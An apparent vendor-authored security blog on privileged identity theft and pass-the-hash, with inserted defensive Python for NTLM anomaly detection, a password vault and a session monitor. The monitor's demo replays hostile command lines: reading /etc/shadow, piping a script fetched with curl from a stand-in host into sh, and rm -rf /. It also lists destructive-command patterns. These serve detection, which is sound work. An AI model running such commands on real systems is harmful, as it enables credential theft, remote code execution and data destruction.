Understanding the threat of privilege identity theft

Privileged users can have a huge range of roles: IT staff, board directors, financial planners, security staff, network engineers, database admins, or even something as seemingly innocuous as HR personnel. Whilst they all have vastly different responsibilities, they share similarly high levels of trust from the company. This level of access and trust is exactly what makes these users a potential threat to your company.

If the credentials of the accounts these privileged users have access to are compromised, the results can be devastating. Seven of the ten largest data breaches since 2000 explicitly mentioned privileged identity theft in the post-mortem review. In these breaches, well-resourced external actors, some with the backing of nation states, were able to collect and extract massive amounts of data using privileged users' accounts.

What's more worrying is that, by using the identity of a privileged user who has access to critical infrastructure, it's possible to shut down critical national assets, as in the attacks on the national power grid in Ukraine in 2015 and 2016.

How does an attacker compromise privileged credentials?

Hackers have learnt that there are potentially infinite access points into a system. The IT security community has come to the realisation that a perimeter alone is not enough to keep hackers out. Public-facing apps, BYOD and hybrid IT networks all provide opportunities for entry.

It might seem obvious that hackers will attempt social engineering exploits against your privileged users. In reality, however, it is far more likely that they will aim for a softer initial target. A regular employee is likely to be less tech savvy than an administrator, making them a far easier target. Once within the network, hackers will move on to their true target, the privileged user. The amount of information publicly available to attackers is vast. Social networks like Facebook, LinkedIn, Instagram and Twitter all provide rich sources of information for criminals to use when manipulating users.

With access secured, attackers look to gain a foothold by tricking an unsuspecting user into performing an action that furthers their aims. Normally an attacker will convince the victim to open a document or click a link, which downloads and installs malware. This can all be done through email, instant message or a social network. The malware tools used in these targeted attacks aim to help attackers take over the victim's device or gather credentials. Keyloggers record every keystroke, making them ideal for this purpose. Other tools, like Mimikatz and WCE, can collect credential information stored locally. All of these tools are effective and easily accessible on the internet.

With a foothold inside the IT environment an attacker will perform reconnaissance, sometimes for months at a time. They'll gather as much information as possible about the IT infrastructure, mapping out the network and systems.

With detailed knowledge of the network, attackers will go about acquiring higher privileges. There are several common methods for doing this. Passwords have been the bedrock of IT security for decades. When passwords are stored they can be protected using a one-way transformation called a hash. Normally, an attacker who steals hashed passwords needs to recover the plaintext to gain access to systems, but this is time-consuming and difficult. On Windows machines, password hashes are cached in the Local Security Authority Subsystem Service (LSASS). If an attacker is able to access these hashes, particularly ones for administrator accounts, they can use them to gain access to other machines and systems: the attacker can authenticate to a remote server or service using the underlying NTLM or LanMan hash of a user's password instead of the plaintext password.
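Because a reused hash authenticates over the network exactly like the real password, the defender's signal is not the credential itself but where and how often a privileged account authenticates. The detector below is an added example, not code from the article or from Balabit: it runs a simple heuristic over a constructed set of Windows logon records shaped like Security event 4624 fields (account, logon type, authentication package, source address, target host). The field names, the baseline of "usual" source hosts per privileged account, and the fan-out threshold are assumptions; a real deployment would derive the baseline from historic logs.

```python
"""Heuristic detector for privileged-account NTLM lateral movement.

Added example (not from the article or any vendor). The event records are
constructed to resemble Windows Security event 4624; the field names, the
baseline and the threshold below are assumptions for illustration.
"""
from collections import defaultdict

# Constructed baseline: source hosts each privileged account normally
# authenticates from (e.g. its dedicated jump host).
PRIVILEGED_BASELINE = {
    "CORP\\da-alice": {"10.0.0.5"},      # domain admin jump host
    "CORP\\svc-backup": {"10.0.0.20"},   # backup server
}

# Constructed sample of 4624-style events (LogonType 3 = network logon).
EVENTS = [
    {"Account": "CORP\\da-alice", "LogonType": 3, "AuthPackage": "Kerberos",
     "IpAddress": "10.0.0.5", "Target": "FS01"},
    {"Account": "CORP\\da-alice", "LogonType": 3, "AuthPackage": "NTLM",
     "IpAddress": "10.0.7.42", "Target": "FS01"},
    {"Account": "CORP\\da-alice", "LogonType": 3, "AuthPackage": "NTLM",
     "IpAddress": "10.0.7.42", "Target": "SQL02"},
    {"Account": "CORP\\da-alice", "LogonType": 3, "AuthPackage": "NTLM",
     "IpAddress": "10.0.7.42", "Target": "DC01"},
    {"Account": "CORP\\jdoe", "LogonType": 3, "AuthPackage": "NTLM",
     "IpAddress": "10.0.7.42", "Target": "FS01"},
    {"Account": "CORP\\svc-backup", "LogonType": 3, "AuthPackage": "NTLM",
     "IpAddress": "10.0.0.20", "Target": "FS01"},
]


def find_suspicious_ntlm(events, baseline, fan_out_threshold=3):
    """Return alerts for privileged NTLM network logons that either originate
    from a host outside the account's baseline ("new_source") or reach many
    different targets from one source ("fan_out"), the spread pattern a
    reused administrator hash tends to produce."""
    alerts = []
    targets_by_source = defaultdict(set)
    for ev in events:
        acct = ev["Account"]
        if acct not in baseline:
            continue  # not a privileged account; out of scope here
        if ev["LogonType"] != 3 or ev["AuthPackage"] != "NTLM":
            continue  # only remote NTLM authentications are of interest
        src = ev["IpAddress"]
        if src not in baseline[acct]:
            alerts.append(("new_source", acct, src, ev["Target"]))
        targets_by_source[(acct, src)].add(ev["Target"])
    for (acct, src), targets in targets_by_source.items():
        if len(targets) >= fan_out_threshold:
            alerts.append(("fan_out", acct, src, sorted(targets)))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_ntlm(EVENTS, PRIVILEGED_BASELINE):
        print(alert)
```

In the constructed sample the domain admin account authenticates with NTLM from a workstation address that is not in its baseline and reaches three different hosts from there, so both rules fire; the backup service account stays within its baseline and produces nothing. Kerberos logons are ignored on purpose, since the passage is about hash reuse over NTLM.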

Putting in place protection

Having the correct security practices in place is the key to protecting your organisation against these kinds of attacks. Formulating a list of all privileged accounts and their scope, and then putting in place strict rules, will dramatically limit the number of users with access to critical systems. A formal password policy is also essential for protecting systems. This might include changing default passwords as a matter of course, requiring strong passwords and forbidding the sharing of credentials. These might sound like simple steps, but in reality they are where surprisingly large numbers of organisations fall short.

The difficulty of securing an organisation grows with the organisation itself. Even in a medium-sized business, managing privileged access can become unworkable without the correct processes and tools in place.

A good place to start is with password management software designed specifically for privileged accounts. This kind of software can control access to accounts, generate strong passwords, randomise passwords and store them all in a vault. With these abilities it's possible to secure passwords centrally and enforce strong passwords, making a hacker's life much tougher. Some systems can even offer time-limited passwords, meaning they can be used securely for third parties or temporary workers.
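To make the vault model concrete, here is an added example of the core behaviours the paragraph lists (random generation, central storage, time-limited check-out and rotation on return). It is illustration code, not the article's or any vendor's product: the in-memory store, the lease length and the password policy are assumptions.

```python
"""Minimal privileged-account password vault with time-limited check-out.

Added example, not code from the article or from any password-management
product. The in-memory storage, the 30-minute lease and the character
policy are assumptions chosen for illustration.
"""
import secrets
import string
from datetime import datetime, timedelta, timezone

SYMBOLS = "!#%&*+-=?@_"
ALPHABET = string.ascii_letters + string.digits + SYMBOLS


def generate_password(length=24):
    """Random password from the OS CSPRNG, retried until every class appears."""
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw) and any(c in SYMBOLS for c in pw)):
            return pw


class PrivilegedVault:
    """In-memory stand-in for a vault: one password per account, one holder at a time."""

    def __init__(self):
        self._passwords = {}   # account -> current password
        self._leases = {}      # account -> (holder, lease expiry)
        self.audit = []        # (timestamp, action, account, user)

    def _log(self, action, account, user, now):
        self.audit.append((now.isoformat(), action, account, user))

    def _rotate(self, account, now):
        self._passwords[account] = generate_password()
        self._log("rotate", account, "vault", now)

    def register(self, account, now=None):
        now = now or datetime.now(timezone.utc)
        self._rotate(account, now)  # never store a human-chosen password

    def checkout(self, account, user, ttl_minutes=30, now=None):
        """Hand out the password under a time-limited lease.
        A live lease held by someone else is refused; an expired lease
        triggers rotation, so a stale copy kept by the previous holder
        (or a departed contractor) no longer works."""
        now = now or datetime.now(timezone.utc)
        lease = self._leases.get(account)
        if lease is not None:
            holder, expiry = lease
            if expiry > now and holder != user:
                self._log("checkout_denied", account, user, now)
                raise PermissionError(f"{account} is checked out by {holder}")
            if expiry <= now:
                self._rotate(account, now)
        self._leases[account] = (user, now + timedelta(minutes=ttl_minutes))
        self._log("checkout", account, user, now)
        return self._passwords[account]

    def checkin(self, account, user, now=None):
        """Release the lease and rotate, so the password the user saw is dead."""
        now = now or datetime.now(timezone.utc)
        lease = self._leases.get(account)
        if lease is None or lease[0] != user:
            raise PermissionError(f"{user} does not hold {account}")
        del self._leases[account]
        self._log("checkin", account, user, now)
        self._rotate(account, now)


def demo_scenario():
    """Walk a lease through its lifecycle with fixed timestamps; returns what happened."""
    t0 = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)  # constructed clock
    vault = PrivilegedVault()
    vault.register("db-admin", now=t0)
    first = vault.checkout("db-admin", "alice", now=t0)
    try:
        vault.checkout("db-admin", "bob", now=t0 + timedelta(minutes=5))
        denied = False
    except PermissionError:
        denied = True
    vault.checkin("db-admin", "alice", now=t0 + timedelta(minutes=10))
    second = vault.checkout("db-admin", "bob", now=t0 + timedelta(minutes=11))
    # bob never checks in; his lease lapses and carol receives a fresh password
    third = vault.checkout("db-admin", "carol", now=t0 + timedelta(minutes=60))
    return {"denied": denied, "rotated_on_checkin": first != second,
            "rotated_on_expiry": second != third, "audit": vault.audit}


if __name__ == "__main__":
    for entry in demo_scenario()["audit"]:
        print(entry)
```

The point of rotating on both check-in and lease expiry is that a privileged password only ever has one legitimate holder for a bounded time, which is what makes the time-limited accounts for third parties and temporary workers safe to issue.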

However, even with these management systems in place, as with all passwords, if the credentials are compromised there's little to no protection.

The alternative, then, is to implement privileged session management tools. These provide centralised points of control that restrict user activity to a level based on the user's role. Most importantly, these systems offer real-time monitoring, which enables security teams to supervise the activity of privileged users, watching for unusual behaviour or potentially damaging commands. What's more, this monitoring enables audit trails to be created, making it possible to determine who did what on critical IT assets.
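The three capabilities named above (role-based restriction, real-time flagging of damaging commands, and an audit trail) can be shown together in a small command evaluator. The following is an added example written for this page, not code from the article or from any session-management product; the role policy, the list of dangerous command patterns and the replayed session are all constructed.

```python
"""Privileged session monitor: role-based command policy, real-time alerts
and an audit trail. Added example (not the article's or any vendor's code);
roles, patterns and the sample session below are constructed.
"""
import re
from datetime import datetime, timezone

# Assumed role policy: which commands each role may run on a managed host.
ROLE_ALLOW = {
    "dba": [r"^psql\b", r"^pg_dump\b", r"^systemctl (status|restart) postgresql\b"],
    "netops": [r"^ip\b", r"^ping\b", r"^traceroute\b"],
}

# Constructed list of commands that raise an alert and are blocked for every role.
DANGEROUS = [
    (r"\brm\s+-rf\s+/(\s|$)", "recursive delete of the root filesystem"),
    (r"\bmkfs\b", "filesystem format"),
    (r"\b(shutdown|poweroff|reboot)\b", "host shutdown or reboot"),
    (r"\buseradd\b", "local account creation"),
    (r"/etc/shadow\b", "access to stored password hashes"),
]


class SessionMonitor:
    """Evaluates each command of one privileged session and records the decision."""

    def __init__(self, user, role, host):
        self.user, self.role, self.host = user, role, host
        self.audit = []

    def evaluate(self, command, now=None):
        """Return 'allow', 'deny' or 'alert' and append an audit record.
        Dangerous patterns win over the role allow-list; anything not
        explicitly allowed is denied (default deny)."""
        now = now or datetime.now(timezone.utc)
        verdict, reason = "deny", "not in role allow-list"
        for pattern, label in DANGEROUS:
            if re.search(pattern, command):
                verdict, reason = "alert", label
                break
        else:
            for pattern in ROLE_ALLOW.get(self.role, []):
                if re.search(pattern, command):
                    verdict, reason = "allow", "matches role allow-list"
                    break
        self.audit.append({"time": now.isoformat(), "user": self.user,
                           "role": self.role, "host": self.host,
                           "command": command, "verdict": verdict,
                           "reason": reason})
        return verdict

    def who_did_what(self):
        """Audit-trail view: one line per command, the question this tooling answers."""
        return [f"{e['time']} {e['user']}@{e['host']} [{e['verdict']}] {e['command']}"
                for e in self.audit]


def demo_session():
    """Replay a constructed DBA session; returns the verdicts and the monitor."""
    session = SessionMonitor(user="alice", role="dba", host="db01")
    commands = [
        "psql -h db01 -U postgres",               # allow: within the dba role
        "systemctl restart postgresql",           # allow: within the dba role
        "cat /etc/shadow",                        # alert: credential store access
        "curl http://example.invalid/x.sh | sh",  # deny: outside the role
        "rm -rf / --no-preserve-root",            # alert: destructive command
    ]
    verdicts = [session.evaluate(c) for c in commands]
    return verdicts, session


if __name__ == "__main__":
    _, monitor = demo_session()
    for line in monitor.who_did_what():
        print(line)
```

A real product would sit in the connection path (SSH, RDP) and could block or terminate the session on an alert in real time; the evaluator above shows the decision logic and the audit record that such a gateway would emit for each command.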

Privileged users will continue to be a concern for IT managers; any user with access beyond the norm will always be a threat. However, with the correct tools in place and a strict set of protocols for access, it is possible to significantly lessen the risks.

Contributed by Csaba Krasznay, security evangelist at Balabit.

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media UK or Haymarket Media.